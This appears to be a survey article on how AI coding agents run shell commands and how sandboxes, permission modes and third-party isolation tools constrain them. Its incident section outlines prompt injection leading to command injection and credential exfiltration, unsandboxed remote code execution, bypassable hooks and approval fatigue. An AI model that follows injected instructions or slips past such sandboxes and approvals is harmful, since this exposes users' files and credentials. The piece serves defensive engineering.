
The defining architectural shift in AI-assisted development between 2025 and 2026 has been the move from code completion to code generation with execution. Modern coding agents — Claude Code, OpenAI Codex CLI, Gemini CLI, Kiro, and a growing ecosystem of open-source alternatives — do not merely suggest edits. They read files, run shell commands, inspect outputs, and loop until a task is complete. The terminal has become the primary interface through which these agents interact with the world.
This shift introduces a fundamental tension: the more autonomy an agent has over a shell, the more productive it becomes, but also the more dangerous. A single malicious or hallucinated command can delete files, exfiltrate credentials, or corrupt system state. The 2025–2026 period has seen an explosion of work on sandboxing, permission models, and execution architectures designed to manage this tension. This document surveys the current state of the art.
At their core, all major terminal agents follow the same pattern — a while(tool_call) loop [1]. The model evaluates a prompt, decides which tool to invoke (read a file, run a shell command, edit code), receives the result, and repeats until the task is complete. Claude Code's implementation centers on a single query() async generator function (~1,700 lines) through which every interaction flows — REPL, SDK, sub-agent, and headless mode alike [2]. Codex CLI implements the same pattern in Rust, and Gemini CLI follows a similar architecture with its March 2026 Plan Mode addition [3].
The Bash tool is the most powerful and most dangerous capability in this loop. It is the "universal adapter" — anything the agent cannot do through a dedicated tool, it can attempt through a shell command. Claude Code's tool taxonomy makes this explicit: Read, Edit, Write, Glob, and Grep handle structured operations, while Bash handles everything else [2]. This generality is precisely what makes shell access the primary attack surface.
A critical architectural decision is whether agents spawn commands through a pseudo-terminal (PTY) or through non-interactive pipes. The distinction has significant implications for both functionality and security.
Non-interactive (pipe-based) execution is the default for most agents. Claude Code spawns shell commands via child_process with stdio: pipe, meaning the subprocess sees isatty() == false. This is intentional: non-interactive mode avoids the complexity of terminal escape codes, interactive prompts, and programs that expect human input. Commands like ls, grep, npm test, and git diff work perfectly in this mode. The output is clean text that feeds directly back into the model's context window [4].
PTY-based execution becomes necessary when agents need to interact with programs that require a terminal — editors like vim, interactive REPLs, or tools that use terminal UI libraries. A 2025 feature request on the Claude Code repository proposed integrating node-pty to enable fully interactive shell sessions, where the agent could spawn vim, and the user would temporarily take over the terminal [4]. The Moltis orchestration framework documented a concrete problem: when Claude Code detects isatty() == false, it silently switches out of interactive mode, making it impossible for outer orchestration agents to drive it programmatically. The fix is to spawn Claude Code inside a PTY so it believes it is attached to a real terminal [5].
PTY MCP servers have emerged as a middle layer. The pty-mcp project (available in both Python and Haskell implementations) exposes persistent terminal sessions as MCP tools, allowing agents to maintain stateful shell sessions across multiple tool calls rather than spawning a fresh process each time [6]. This is useful for workflows that require environment setup (activating a virtualenv, setting environment variables) before running subsequent commands.
The security tradeoff is clear: PTY-based execution gives agents more capability but also more attack surface. Interactive programs can present unexpected prompts, and terminal escape sequences can be used to obfuscate malicious output. The emerging consensus is to use non-interactive execution by default and reserve PTY sessions for specific, well-understood use cases.
Claude Code's security model has evolved through two distinct phases. Initially, it relied on a permission-based model: read-only by default, with explicit user approval required for modifications or command execution. Safe commands like echo and cat were auto-allowed, but most operations required clicking "approve" [7].
In October 2025, Anthropic introduced sandboxing for Claude Code, built on OS-level primitives. The sandbox-runtime (srt) tool, released as an open-source research preview, uses sandbox-exec (Seatbelt) on macOS and Bubblewrap (bwrap) on Linux to enforce filesystem and network isolation at the kernel level [7][8]. The architecture enforces two boundaries simultaneously:
~/.ssh, ~/.aws, or system configuration files.Anthropic reported that sandboxing reduced permission prompts by 84% in internal usage while increasing security [7]. The srt tool is designed with a "secure-by-default" philosophy: processes start with minimal access, and developers explicitly open only the holes they need [8].
Claude Code also supports a hooks system with 17 lifecycle event interception points, allowing teams to write custom policies — for example, blocking certain API calls while allowing others. These hooks operate at the application layer, providing flexibility that kernel-level sandboxing cannot match, but they are theoretically bypassable by sufficiently crafted commands [9].
Codex CLI takes a different approach: security is enforced entirely at the OS kernel level, with no application-layer fallback. Originally a Node.js/TypeScript project released in mid-2025, OpenAI rewrote the core in Rust by late 2025 (the codex-rs crate), and as of early 2026 Rust accounts for roughly 95% of the codebase [9][10].
Codex CLI offers three sandbox permission modes configured via config.toml:
| Mode | Behavior |
|---|---|
| Suggest (read-only) | Agent can read files and propose changes but cannot modify anything |
| Auto-edit (default) | Agent can write files within the project directory; network is blocked |
| Full access | No restrictions — intended for trusted environments only |
The implementation is platform-specific [9][10]:
sandbox-exec with custom profiles per permission level.The key architectural difference from Claude Code is that Codex's restrictions cannot be circumvented by the model regardless of what commands it generates. A command running inside the Bubblewrap namespace simply cannot access files outside the allowed paths — the kernel denies the syscall. The tradeoff is reduced flexibility: Claude Code's hooks allow nuanced, project-specific policies, while Codex's model is more binary [9].
Google's Gemini CLI shipped two major features in March 2026: Plan Mode (enabled by default) and LXC/gVisor sandbox support [3]. Plan Mode requires the agent to present a step-by-step execution plan before taking any action, giving developers visibility into agent intent before execution begins.
For isolation, Gemini CLI offers three tiers:
| Feature | None | LXC | gVisor |
|---|---|---|---|
| Filesystem isolation | ❌ | ✅ | ✅ |
| Network isolation | ❌ | ✅ | ✅ |
| Kernel protection | ❌ | Partial | ✅ |
| Best for | Dev/Testing | CI/CD | Production |
gVisor implements a user-space kernel that intercepts system calls, exposing only ~70 syscalls versus 300+ in the Linux kernel. This provides strong isolation with minimal overhead, making it suitable for security-sensitive environments [3].
Kiro operates as a terminal-native AI agent with a tool-based architecture similar to Claude Code. It executes shell commands through a Bash tool, reads and writes files through dedicated tools, and follows the same agent loop pattern. Kiro's safety model relies on a tiered risk assessment: low-risk actions (editing files, running linters) proceed without hesitation, medium-risk actions (installing dependencies, modifying configs) proceed with notification, and high-risk actions (production changes, data deletion) require explicit user confirmation. This application-layer approach prioritizes developer velocity while maintaining guardrails for destructive operations.
The gap between what agents can do and what they should be allowed to do has spawned a rich ecosystem of third-party sandboxing tools in 2025–2026:
Sandvault (brew install sandvault) creates a separate non-admin macOS user account and runs agents inside a macOS sandbox. It supports Claude Code, Codex CLI, Gemini CLI, and others via simple wrapper commands (sv claude, sv codex). Combined with git worktrees, it enables parallelized agent work where each agent operates in an isolated environment [11].
nono enforces kernel-level boundaries with JSON-based profiles defining filesystem, network, and command access rules. It captures a filesystem snapshot before the agent starts and can restore files to their pre-agent state. A runtime supervisor mode prompts users when agents attempt to access resources outside their sandbox [12].
ai-jail (Rust, available on crates.io) combines Bubblewrap namespace isolation, Landlock LSM, and seccomp-bpf syscall filtering. Its --lockdown mode mounts the project read-only, disables GPU/Docker/display passthrough, and blocks all network access — designed for hostile workloads [13].
FortShell provides a terminal-first workspace with OS-level file protection. Users right-click sensitive files to protect them, and AI agents running in sandboxed terminals receive Operation not permitted when attempting to access protected files. Protection is enforced at the kernel level and cannot be bypassed through symlinks or scripting [14].
Cloister uses Docker containers with an allowlist proxy for network traffic. It distinguishes between "action control" (enumerating what the agent can do) and "scope control" (limiting where the agent can have effects), preferring the latter as more robust [15].
ExitBox runs agents in isolated Docker containers with DNS isolation, mandatory proxy usage, and capability restrictions. It automatically injects sandbox instructions into each agent at container start, informing the agent about its restrictions so it can adapt its behavior [16].
The 2025–2026 period has produced concrete evidence of the risks inherent in agent shell access:
Command injection via prompt injection: CVE-2025-67511 demonstrated how a cybersecurity AI agent's SSH functionality could be exploited. Attacker-controlled hostnames containing shell metacharacters were passed unsanitized to the ssh command, enabling exfiltration of AWS credentials from the agent's host [17].
Unsandboxed code execution as RCE: Multiple frameworks have been found to execute LLM-generated code without any sandboxing. Microsoft's AutoGen LocalCommandLineCodeExecutor writes model-generated code to disk and runs it as a local subprocess with only a UserWarning as a safeguard [18]. AgentScope's execute_shell_command provides zero isolation — no containers, no code inspection, no privilege dropping — and when exposed over HTTP, enables full remote code execution via prompt injection [19].
Approval fatigue: Even when permission systems exist, users habituate to clicking "approve" on every action, effectively negating the safety mechanism. This is a recognized failure mode across all agent frameworks and is a primary motivation for sandbox-based approaches that eliminate the need for per-action approval [7][20].
Shell metacharacter expansion: Agent-generated command arguments that contain glob patterns (*, ?), variable expansion ($VAR, $(cmd)), or command substitution can expand unexpectedly when passed to a shell. The recommended mitigation is to use spawn() with shell: false rather than exec(), and to pass content via stdin rather than argv [21][22].
The collective experience of 2025–2026 has converged on several principles:
Separate inference from execution. The LLM generating commands and the sandbox running them should be completely decoupled, with a command router in between that validates, optionally requires human approval, truncates output, and feeds results back [23].
Defense in depth, not single-layer. One analysis of the OpenClaw agent identified six distinct security layers for shell execution: host selection, safe-bin allowlist, environment sanitization, script preflight, approval gating, and elevated mode control. Removing any single layer compromises the others [24].
Eliminate the shell from the data path. Pass routing information as clean argv tokens, pass content through stdin as structured JSON, and adopt NDJSON or JSON-RPC 2.0 framing for multi-message protocols. This separates data from code at the process boundary [22].
Set hard timeouts at every level. Per tool call (e.g., 30 seconds), per task loop (e.g., 20 minutes), and per sandbox lifetime. A stuck agent can run indefinitely and rack up compute costs [20].
Log everything, filter network egress. Every sandbox should emit an immutable audit log of network requests, shell commands, and file writes. Default to --network=none with an explicit allowlist [20].
Start restrictive, expand as needed. It is easier to add permissions than to audit what an overly permissive agent accessed [12].
Credential isolation. Never share primary cloud or email credentials with an agent. Use dedicated credentials, store secrets in encrypted vaults, and substitute placeholders at execution time [25].
The terminal has become the primary execution environment for AI coding agents, and the security implications of this shift are now well understood. The industry has moved from naive "run commands and hope for the best" approaches to sophisticated, multi-layered sandboxing architectures that enforce restrictions at the OS kernel level. The three major agents — Claude Code, Codex CLI, and Gemini CLI — each represent a different point in the design space, trading off flexibility against enforcement strength. Meanwhile, a vibrant third-party ecosystem fills the gaps with tools that work across agents.
The fundamental challenge remains unsolved: agents cannot reliably distinguish legitimate from adversarial instructions, and any system that grants shell access to an LLM is granting it to whatever content the LLM processes. Sandboxing does not eliminate this risk — it bounds the blast radius. The trajectory is clear: toward kernel-level enforcement by default, capability-based permission models, and architectural separation of inference from execution. The agents that survive will be the ones that make security invisible to the developer while making compromise visible to the auditor.
[1] "How Claude Code Works: Architecture & Internals" — https://cc.bruniaux.com/guide/architecture/
[2] "Ch 1. The Architecture of an AI Agent" and "Ch 5. The Agent Loop" — https://claude-code-from-source.com/ch01-architecture/ and https://claude-code-from-source.com/ch05-agent-loop/
[3] "Gemini CLI Plan Mode Guide: Enhanced Sandboxing for Safe AI Agent Development" — https://gemilab.net/en/articles/gemini-dev/gemini-cli-plan-mode
[4] "[FEATURE] Add Interactive Shell Support to the Bash Tool" — https://github.com/anthropics/claude-code/issues/9881
[5] "PTY-based interactive Claude Code CLI control for autonomous multi-agent orchestration" — https://github.com/moltis-org/moltis/issues/235
[6] "A Deep Dive into PTY Terminal MCP Server" — https://skywork.ai/skypage/en/pty-terminal-mcp-server/1980567633007206400
[7] "Making Claude Code more secure and autonomous with sandboxing" — https://www.anthropic.com/engineering/claude-code-sandboxing
[8] "anthropic-experimental/sandbox-runtime" — https://github.com/anthropic-experimental/sandbox-runtime
[9] "OpenAI Codex CLI: The Rust-Powered Terminal Agent Taking on Claude Code" — https://botmonster.com/posts/openai-codex-cli-rust-powered-ai-agent/
[10] "Codex CLI Cheat Sheet: Shortcuts and Commands" — https://computingforgeeks.com/codex-cli-cheat-sheet/
[11] "Sandboxes and Worktrees: My secure Agentic AI Setup in 2026" — https://mikemcquaid.com/sandboxed-agent-worktrees-my-coding-and-ai-setup-in-2026/
[12] "Safe AI Agent Execution with nono" — https://nono.sh/guides/safe-ai-agent-execution
[13] "ai-jail v0.9.0" — https://crates.io/crates/ai-jail/0.9.0
[14] "FortShell" — https://github.com/evergreen96/FortShell
[15] "Cloister: Secure sandboxing for AI coding agents" — https://github.com/xdg/cloister
[16] "ExitBox" — https://github.com/cloud-exit/exitbox
[17] "Cybersecurity AI agent is Vulnerable to Command Injection (CVE-2025-67511)" — https://checkmarx.com/zero-post/cybersecurity-ai-agent-is-vulnerable-to-command-injection-cve-2025-67511/
[18] "[Security] LocalCommandLineCodeExecutor executes LLM-generated code without sandboxing" — https://github.com/microsoft/autogen/issues/7462
[19] "Unsandboxed Code Execution Tools Enable Remote Code Execution via Prompt Injection" — https://gist.github.com/YLChen-007/c084d69aaeda6729f3988603f2b0ce6e
[20] "AI Agent Sandbox: How to Safely Run Autonomous Agents in 2026" — https://www.firecrawl.dev/blog/ai-agent-sandbox
[21] "Security: Unvalidated User Input in Shell Command Arguments" — https://github.com/kardolus/chatgpt-cli/issues/177
[22] "Safe Inter-Process Communication Patterns for AI Agent Toolchains" — https://zylos.ai/research/2026-02-26-safe-ipc-patterns-ai-agent-toolchains
[23] "Why Your AI Agent's Shell Access Is a Security Nightmare" — https://blog.authon.dev/why-your-ai-agent-s-shell-access-is-a-security-nightmare-and-how-to-fix-it
[24] "Protect the exec tool with six security layers, not one" — https://wiki.charleschen.ai/ai/processed/wiki/llm-core/security/techniques/exec-tool-security-layers
[25] "PrismorSec/immunity-agent" — https://github.com/PrismorSec/immunity-agent